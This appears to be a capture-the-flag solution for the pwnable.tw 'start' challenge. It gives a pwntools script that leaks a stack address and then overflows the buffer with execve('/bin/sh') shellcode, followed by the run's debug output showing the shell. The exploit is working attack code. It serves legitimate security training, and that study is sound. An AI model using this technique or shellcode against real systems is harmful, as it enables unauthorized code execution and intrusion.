pwnable tw start

# exploit.py

from pwn import *

# pwntools repository
# https://github.com/Gallopsled/pwntools

# pwntools documents, reference
# http://docs.pwntools.com/en/stable/index.html
# https://qiita.com/8ayac/items/12a3523394080e56ad5a

def send_payload(payload):
    log.info("Send payload = %s" % repr(payload))
    r.send(payload)
    return

def sendline_payload(payload):
    log.info("Send payload = %s" % repr(payload))
    r.sendline(payload)
    return

binary = './start'
host = 'chall.pwnable.tw'
port = 10000

elf = ELF(binary)

context(arch = 'i386', os = 'linux')
context.log_level = 'debug'

# file start
# start: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

# checksec.sh --file start
# RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
# No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   start

REMOTE = len(sys.argv) >= 2
if REMOTE:
    # remote
    r = remote(host, port)
else:
    # local
    r = process(binary)

# linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
# http://shell-storm.org/shellcode/files/shellcode-752.php
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

# Gadget
# rp --file=start --unique
# 0x08048087: mov ecx, esp ; mov dl, 0x14 ; mov bl, 0x01 ; mov al, 0x04 ; int 0x80 ;  (1 found)

# gef patt c 32
# [+] Generating a pattern of 32 bytes
# aaaabaaacaaadaaaeaaafaaagaaahaaa

# $eip   : 0x61616166 ("faaa"?)

# gef patt o faaa
# [+] Searching 'faaa'
# [+] Found at offset 17 (little-endian search) likely
# [+] Found at offset 20 (big-endian search)

# ROP
# 'A' * 20
# write(1, esp, 20)
print r.recvuntil(':')

rop = ROP(elf)

payload = 'A' * 20
# write(1, esp, 20)
rop.raw(0x08048087)

print rop.dump()
payload += rop.chain()

send_payload(payload)
stack_addr = r.recv(4)
log.info('Stack addr : %x' % unpack(stack_addr))

payload = 'A' * 20
payload += pack(unpack(stack_addr)+20)
payload += shellcode

send_payload(payload)

r.interactive()
python exploit.py r
[*] '/home/vagrant/host-share/pwnabletw/Start/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to chall.pwnable.tw on port 10000: Done
[DEBUG] Received 0x14 bytes:
    "Let's start the CTF:"
Let's start the CTF:
[*] Loaded cached gadgets for './start'
0x0000:        0x8048087
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08'
[DEBUG] Sent 0x18 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    00000010  41 41 41 41  87 80 04 08                            │AAAA│····││
    00000018
[DEBUG] Received 0x14 bytes:
    00000000  70 0a 89 ff  01 00 00 00  34 0f 89 ff  00 00 00 00  │p···│····│4···│····│
    00000010  46 0f 89 ff                                         │F···││
    00000014
[*] Stack addr : ff890a70
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x84\n\x89\xff1\xc9\xf7\xe1Qh//shh/bin\x89\xe3\xb0\x0b\xcd\x80'
[DEBUG] Sent 0x2d bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    00000010  41 41 41 41  84 0a 89 ff  31 c9 f7 e1  51 68 2f 2f  │AAAA│····│1···│Qh//│
    00000020  73 68 68 2f  62 69 6e 89  e3 b0 0b cd  80           │shh/│bin·│····│·│
    0000002d
[*] Switching to interactive mode
\x00\x00\x004\x0f\x89\xff\x00\x00\x00\x00F\x0f\x89\xff$